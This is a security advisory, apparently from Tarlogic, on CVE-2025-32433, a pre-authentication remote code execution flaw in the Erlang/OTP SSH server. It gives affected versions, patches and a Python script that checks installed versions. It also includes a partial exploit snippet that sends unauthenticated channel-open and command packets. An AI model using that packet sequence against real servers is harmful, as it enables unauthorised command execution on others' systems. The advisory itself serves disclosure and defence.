CVE-2025-32433: Remote Code Execution in Erlang/OTP SSH Server
CVE-2025-32433 allows remote code execution on the Erlang/OTP SSH server without prior authentication
CVE-2025-32433, a critical vulnerability affecting the SSH server implemented in Erlang/OTP (Open Telecom Platform), has been made public.
This vulnerability allows remote code execution without prior authentication by sending specifically crafted protocol packets during an incomplete SSH session. Given its very low exploitation complexity and its total impact on the confidentiality, integrity, and availability of the system, this threat has been classified as critical.
A few days after its disclosure, multiple public exploits emerged, significantly increasing the risk of active exploitation in the short term.
Main characteristics of CVE-2025-32433
The main characteristics of the vulnerability are outlined below:
- CVE Identifier: CVE-2025-32433.
- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H (10.0 Critical).
- Publication date: 16/04/2025.
- Affected software: Erlang/OTP (versions 25.x, 26.x, 27.x).
- Exploitation requirements:
  - Network access to the port where the Erlang/OTP SSH server is listening.
  - No prior authentication required.
  - No user interaction required.
- Affected versions:
  - OTP 25: up to and including 25.3.2.19.
  - OTP 26: up to and including 26.2.5.10.
  - OTP 27: up to and including 27.3.2.
Exploitation process
This vulnerability does not involve memory corruption, buffer overflows (BOF), or other complex conditions. It is purely a protocol logic flaw: the Erlang/OTP SSH server processes channel opening and command execution requests before the authentication phase has completed, so the usual authentication gate is never applied to them.
A functional exploit follows these steps:
- Establish a TCP SSH session.
- Exchange banners.
- Send an SSH_MSG_KEXINIT packet.
- Send an SSH_MSG_CHANNEL_OPEN packet.
- Send an SSH_MSG_CHANNEL_REQUEST with an arbitrary command.
Key exploit snippet:
    # 1. Establish a TCP SSH session
    s = socket.create_connection((HOST, PORT), timeout=5)
    # 2. Exchange SSH banners
    s.sendall(b"SSH-2.0-OpenSSH_8.9\r\n")
    banner = s.recv(1024)
    # 3. Send SSH_MSG_KEXINIT (initiate key exchange)
    kex_packet = build_kexinit()
    s.sendall(pad_packet(kex_packet))
    # 4. Send SSH_MSG_CHANNEL_OPEN (open channel without authentication)
    chan_open = build_channel_open()
    s.sendall(pad_packet(chan_open))
    # 5. Send SSH_MSG_CHANNEL_REQUEST (execute arbitrary command)
    chan_req = build_channel_request(
        command='file:write_file("/lab.txt", <<"pwned">>).'
    )
    s.sendall(pad_packet(chan_req))
Mitigation of CVE-2025-32433
The main solution is to update to the patched versions:
- OTP 25.3.2.20.
- OTP 26.2.5.11.
- OTP 27.3.3.
In environments where immediate patching is not possible, it is recommended to:
- Disable the Erlang/OTP SSH server if not essential.
- Restrict SSH port access using firewalls or ACLs.
- Monitor for anomalous connection attempts to the Erlang/OTP SSH service.
Vulnerability detection
The presence of CVE-2025-32433 can be identified by checking the Erlang/OTP version installed on the system. This can be done using commands such as erl -version or by inspecting the list of installed packages to verify whether a vulnerable version is in use.
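The following is an added example, not code from the original advisory or from the Erlang/OTP project, that automates this version check. Two details matter in practice: the affected range is per major line (25, 26 and 27 each have their own first fixed release), and erl -version alone only reports the ERTS emulator version, so the script instead reads the OTP_VERSION file that an OTP installation keeps under <root>/releases/<major>/ (that file location, and the presence of erl on PATH, are assumptions of this example). Only hosts that actually run the ssh application are exposed, so a vulnerable version string is a reason to check whether the SSH daemon is started, not proof of exposure.

```python
"""Classify an Erlang/OTP release string against the CVE-2025-32433 affected ranges.

Added example for this advisory (not project code). The fixed releases below
are the ones listed in the mitigation section; `installed_otp_version()` assumes
an `erl` on PATH and the standard <root>/releases/<major>/OTP_VERSION layout.
"""
import re
import subprocess
from typing import Optional, Tuple

# First fixed release of each affected OTP major line, as given in the advisory.
FIXED_VERSIONS = {
    25: (25, 3, 2, 20),
    26: (26, 2, 5, 11),
    27: (27, 3, 3),
}


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn '26.2.5.10' or 'OTP 26.2.5.10' into a tuple of ints for comparison."""
    match = re.search(r"(\d+(?:\.\d+)*)", text)
    if not match:
        raise ValueError(f"no version number found in {text!r}")
    return tuple(int(part) for part in match.group(1).split("."))


def is_vulnerable(version: str) -> Optional[bool]:
    """True if the release is in an affected line and older than its first fix.

    Returns None for OTP lines the advisory does not list (e.g. 24 or 28), so the
    caller can distinguish 'not covered' from 'confirmed fixed'. Python compares
    tuples lexicographically, so (27, 3) < (27, 3, 3) is True, which is the
    correct reading of '27.3' being older than '27.3.3'.
    """
    parsed = parse_version(version)
    fixed = FIXED_VERSIONS.get(parsed[0])
    if fixed is None:
        return None
    return parsed < fixed


def verdict(version: str) -> str:
    """Human-readable classification used by the command-line entry point."""
    result = is_vulnerable(version)
    if result is None:
        return f"OTP {version}: major line not covered by the CVE-2025-32433 advisory"
    if result:
        return f"OTP {version}: VULNERABLE to CVE-2025-32433 if the ssh application is running"
    return f"OTP {version}: at or above the first fixed release"


def installed_otp_version() -> Optional[str]:
    """Read the full OTP release string of the `erl` found on PATH.

    `erl -version` prints only the ERTS emulator version, so this asks the runtime
    for the path of its OTP_VERSION file and reads it. Returns None when erl is
    missing or the file cannot be read (assumed layout, see module docstring).
    """
    expr = (
        'io:format("~s", [filename:join([code:root_dir(), "releases", '
        'erlang:system_info(otp_release), "OTP_VERSION"])]), halt().'
    )
    try:
        proc = subprocess.run(
            ["erl", "-noshell", "-eval", expr],
            capture_output=True, text=True, timeout=20, check=True,
        )
        with open(proc.stdout.strip(), encoding="utf-8") as fh:
            return fh.read().strip()
    except (OSError, subprocess.SubprocessError):
        return None


if __name__ == "__main__":
    installed = installed_otp_version()
    if installed is None:
        print("erl not found or OTP_VERSION unreadable; call verdict('<version>') manually")
    else:
        print(verdict(installed))
```

On a host with Erlang installed, running the script prints the verdict for the local release; in inventory or CMDB scripts, feed package-manager version strings straight into verdict() instead.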
Tarlogic offers an emerging vulnerability service that proactively and continuously monitors the security perimeter of companies in order to detect and urgently report the presence of this vulnerability, and of any other weakness that could pose a critical threat to the security of corporate assets.